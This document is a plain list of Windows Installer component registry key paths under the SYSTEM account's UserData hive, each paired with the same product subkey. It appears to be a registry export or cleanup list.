HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B303817007187F35EA9A423F1D8F008C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B303817007187F35EA9A423F1D8F008C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1F3846DBF12BFD259A5674E85DE21DCD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1F3846DBF12BFD259A5674E85DE21DCD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5ED6F413208A2858B72AE17272F5895
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5ED6F413208A2858B72AE17272F5895\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C93EC6DA7B37E1945A9EE119DC7839C7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C93EC6DA7B37E1945A9EE119DC7839C7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D47D6308642D3CF54A1AFDBF48BDEA2D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D47D6308642D3CF54A1AFDBF48BDEA2D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\367DE7B51A4538252840D02473834AD2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\367DE7B51A4538252840D02473834AD2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D67E8476B92A0A5CBE4747FEDEB39C6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5D67E8476B92A0A5CBE4747FEDEB39C6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96B466DE550378043B12DD5A48F3E4CD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96B466DE550378043B12DD5A48F3E4CD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EF368E4E749F46C5EBC57A9D6B33A5E8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EF368E4E749F46C5EBC57A9D6B33A5E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37F53AD5090C8755E8549CA4E3718817
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37F53AD5090C8755E8549CA4E3718817\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D3B7421FC36A9D852824C1F3A50931AC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D3B7421FC36A9D852824C1F3A50931AC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B06C3283CDB40DA59BE9F6BEE62E7418
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B06C3283CDB40DA59BE9F6BEE62E7418\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9847B82FABFD18159AC906BAE91E8958
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9847B82FABFD18159AC906BAE91E8958\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\19BC1B0790167CD52A396BA62A0DA5E4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\19BC1B0790167CD52A396BA62A0DA5E4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9C655E638239D835388131E156D5F16E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9C655E638239D835388131E156D5F16E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\996335CC67998635D98924FEB9EBD6D4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\996335CC67998635D98924FEB9EBD6D4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\345B3A05982DFA756BC031E71FA6D5CE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\345B3A05982DFA756BC031E71FA6D5CE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD7959B8A54E81157A9A4903C8F9CAAA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD7959B8A54E81157A9A4903C8F9CAAA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1FC254053C4CFFF56B15A797E4DD1CA4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1FC254053C4CFFF56B15A797E4DD1CA4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\829CE7399A22AF057AB44D1443559A93
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\829CE7399A22AF057AB44D1443559A93\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9A84EFC30D853845AAE14CE4E5EF24CD
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9A84EFC30D853845AAE14CE4E5EF24CD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1DBBEAEF09217EC5BA68A8F094513181
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1DBBEAEF09217EC5BA68A8F094513181\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D7B8DC7A877F295FBF38CB7B147B2EF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D7B8DC7A877F295FBF38CB7B147B2EF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E770843BE38B4A85C8CBE91AE6A6060A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E770843BE38B4A85C8CBE91AE6A6060A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\40011B8C3ABE12D5CAB4BC6905008EEB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\40011B8C3ABE12D5CAB4BC6905008EEB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2ED78EF96F2A9DA5FA5E2C3AA5E96AF6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2ED78EF96F2A9DA5FA5E2C3AA5E96AF6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ACA40CC85695FD353A5A95AF9585F96C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ACA40CC85695FD353A5A95AF9585F96C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9AFED970672290155A258F419CAADFB0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9AFED970672290155A258F419CAADFB0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1903D5D055F83B75FA49798590FBE976
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1903D5D055F83B75FA49798590FBE976\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE6E102742D27995FADFF0D2E59D28B6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE6E102742D27995FADFF0D2E59D28B6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E36F9B72DE9BCF5F93A39845D9E7427
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E36F9B72DE9BCF5F93A39845D9E7427\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37101C3AD5CB0A4529D51B7D6931A707
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37101C3AD5CB0A4529D51B7D6931A707\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FEEF9B44D2A06135EBA3677A56A9B00C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FEEF9B44D2A06135EBA3677A56A9B00C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D7733539FC93F94529F9882F6E06B743
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D7733539FC93F94529F9882F6E06B743\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D983DE65083F6165E84D7D81C3456A96
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D983DE65083F6165E84D7D81C3456A96\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\68E8FDE9D989D1C57969C3606EA2BB4A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\68E8FDE9D989D1C57969C3606EA2BB4A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16122E2CE919C245B8C15E3EBFBDF38C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\16122E2CE919C245B8C15E3EBFBDF38C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\41A731F9A8004255785C93D31F68BD92
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\41A731F9A8004255785C93D31F68BD92\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02AA25815F865AC528A6EAFE5B5953A8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02AA25815F865AC528A6EAFE5B5953A8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\53690B716CECF0A5CB6F102A9E2EE01D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\53690B716CECF0A5CB6F102A9E2EE01D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\62B58653D3B899352AA05B3753D23E47
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\62B58653D3B899352AA05B3753D23E47\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F98CCF0A86F707750ACF23F70A9A6637
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F98CCF0A86F707750ACF23F70A9A6637\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638AE7617502EA75C94B4830EB4D7F3B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638AE7617502EA75C94B4830EB4D7F3B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\011804B4FB6B8305E8CC58DC9CE8EC4F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\011804B4FB6B8305E8CC58DC9CE8EC4F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B7DEF40605C9A3259A95AB82CFEA9B3E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B7DEF40605C9A3259A95AB82CFEA9B3E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6DDFC252F2D833152BED8340395D3FBC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6DDFC252F2D833152BED8340395D3FBC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\74A9F7E74284BC95984F6ED9EA0E712A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\74A9F7E74284BC95984F6ED9EA0E712A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5023DBEFA720EAA518C7CBB20B56DD15
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5023DBEFA720EAA518C7CBB20B56DD15\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\24BE22D58150D615D8AF8CDDF879E8D5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\24BE22D58150D615D8AF8CDDF879E8D5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\933B81E88C1846051B415F247B4D61A3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\933B81E88C1846051B415F247B4D61A3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F6CCBA211C8A133519FB576E7E35BD37
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F6CCBA211C8A133519FB576E7E35BD37\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A2C82E3B6350C7357B9D58B0D5B01146
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A2C82E3B6350C7357B9D58B0D5B01146\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\26668CF014398825995DE242F8B58EAA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\26668CF014398825995DE242F8B58EAA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F1C18E6A08205F5A816F9C590BE063C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F1C18E6A08205F5A816F9C590BE063C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9EA73F3A229BF2C5384323EDA711364D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9EA73F3A229BF2C5384323EDA711364D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\783BDCA1A91925956A7611C3D1925C0D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\783BDCA1A91925956A7611C3D1925C0D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0685DBFE2B1E8D4539B3796824CC56C7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0685DBFE2B1E8D4539B3796824CC56C7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42A6D56C89620395FA2491DF6635A062
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42A6D56C89620395FA2491DF6635A062\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F701B9FD22B152A5DB42933D304EAEA5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F701B9FD22B152A5DB42933D304EAEA5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\19BA19E3153C00354B813FB84C82BFD5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\19BA19E3153C00354B813FB84C82BFD5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2DC2F9EFDC1D300588DD6FEC5185F9AC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2DC2F9EFDC1D300588DD6FEC5185F9AC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BC9AC62F6461E756AAFFB515E8FEAA4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BC9AC62F6461E756AAFFB515E8FEAA4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8C1AAA651F5924A5B83154669E91840B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8C1AAA651F5924A5B83154669E91840B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BE06DCF97B84B005FAFB4C6F3377F60E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BE06DCF97B84B005FAFB4C6F3377F60E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DA443E41DE1F7A2569B1DA2F14054E3B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DA443E41DE1F7A2569B1DA2F14054E3B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\87243EA43BBE15C5D9A65BCFFC7F2661
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\87243EA43BBE15C5D9A65BCFFC7F2661\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13AD7C72B426DC659ADB99EA56618C98
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13AD7C72B426DC659ADB99EA56618C98\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AE1392131665C005AAAF4852A6294703
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AE1392131665C005AAAF4852A6294703\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\450C08C642BD61856915A3F19E4E0BE2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\450C08C642BD61856915A3F19E4E0BE2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F4751C48823A2AF58B609D5C9FF2754C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F4751C48823A2AF58B609D5C9FF2754C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FBE6C7A3C9637AC5C904D3D25191B9E4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FBE6C7A3C9637AC5C904D3D25191B9E4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0A15C1A419A17E65599AC223F37F242D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0A15C1A419A17E65599AC223F37F242D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B574EE83CDA018F539E9E867CC0B1559
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B574EE83CDA018F539E9E867CC0B1559\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\431C310C35060AE54A42FC04D55C591B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\431C310C35060AE54A42FC04D55C591B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FCDC386CEC4DFD657A33D6D2AC60194E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FCDC386CEC4DFD657A33D6D2AC60194E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96C6F2F6E9A8DD350901A3C4A512FB0E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96C6F2F6E9A8DD350901A3C4A512FB0E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC0C10208798F3E5F8DB20EAB67E5CB4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC0C10208798F3E5F8DB20EAB67E5CB4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5009D629A6CAAC853B60CF3C4BCD2082
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5009D629A6CAAC853B60CF3C4BCD2082\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F74BBDCDB2E1C7B50B1E4A51078A7767
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F74BBDCDB2E1C7B50B1E4A51078A7767\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\10F7A23E52FCB7F5CB9E8FA0E80F357C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\10F7A23E52FCB7F5CB9E8FA0E80F357C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BB4A579688FFBD0599B0C968115178C9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BB4A579688FFBD0599B0C968115178C9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7F493F7487A50705583BFEA9BC347CC6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7F493F7487A50705583BFEA9BC347CC6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D2A8D667FB760F95B8DF178CA3A4308E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D2A8D667FB760F95B8DF178CA3A4308E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49EA6BB83B1DCE85FA115ACDA51F650D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49EA6BB83B1DCE85FA115ACDA51F650D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\17FFFD9D4360A1D56BEC66B41BBD02E7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\17FFFD9D4360A1D56BEC66B41BBD02E7\00006109F00000000000000000F01FEC
